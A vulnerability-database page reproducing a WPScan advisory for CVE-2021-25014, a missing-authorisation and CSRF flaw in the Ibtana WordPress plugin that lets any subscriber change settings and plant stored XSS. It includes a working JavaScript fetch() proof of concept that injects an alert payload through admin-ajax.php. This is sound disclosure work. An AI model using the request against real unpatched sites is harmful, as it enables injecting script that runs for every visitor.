Lucene search
Krzysztof ZającWPVDB-ID:63C58D7F-8E0B-4AA5-B3C8-8726B4F19BF1HistoryJan 12, 2022 - 12:00 a.m.
Ibtana < 1.1.4.9 - Subscriber+ Settings Update to Stored XSS
2022-01-1200:00:00
Krzysztof Zając
wpscan.com
5
0.001 Low
EPSS
Percentile
24.8%
The plugin does not have authorisation and CSRF checks in the ive_save_general_settings AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin’s settings which could lead to Stored Cross-Site Scripting issue. Note: v1.1.4.7 added CSRF check, authorisation was added in 1.1.4.9
PoC
fetch(“http://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “action=ive_save_general_settings&ive;_custom_js=alert(/XSS/)”, “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); The XSS will be triggered in all frontend pages in the Pro version
| CPE | Name | Operator | Version |
|---|---|---|---|
| ibtana-visual-editor | lt | 1.1.4.9 |
Related
cve
cve
CVE-2021-25014
2022-02-14 12:15:14
wpexploit
wpexploit
Ibtana < 1.1.4.9 - Subscriber+ Settings Update to Stored XSS
2022-01-12 00:00:00
patchstack
patchstack
prion
prion
Cross site scripting
2022-02-14 12:15:00
cvelist
cvelist
CVE-2021-25014 Ibtana < 1.1.4.9 - Subscriber+ Settings Update to Stored XSS
2022-02-14 09:20:42
nvd
nvd
CVE-2021-25014
2022-02-14 12:15:14
cnvd
cnvd
WordPress Ibtana plugin cross-site scripting vulnerability
2022-02-16 00:00:00